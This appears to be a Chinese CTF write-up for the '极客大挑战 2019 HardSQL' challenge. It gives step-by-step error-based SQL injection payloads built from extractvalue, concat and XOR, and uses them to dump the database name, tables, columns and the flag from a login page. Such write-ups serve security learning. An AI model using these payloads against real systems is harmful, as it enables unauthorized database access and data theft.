当前位置: 代码网 > it编程>数据库>MsSqlserver > [极客大挑战 2019]HardSQL1

[极客大挑战 2019]HardSQL1

2024年08月02日 MsSqlserver 我要评论
flag出来了,但是只有一半,使用right和left。拿到题目,好多类似的,这次估计更难,sql注入漏洞。

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('h4rdsq1'))))%23

flag出来了,但是只有一半,使用right和left

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.h4rdsq1))))%23

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.h4rdsq1))))%23

得到flag

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com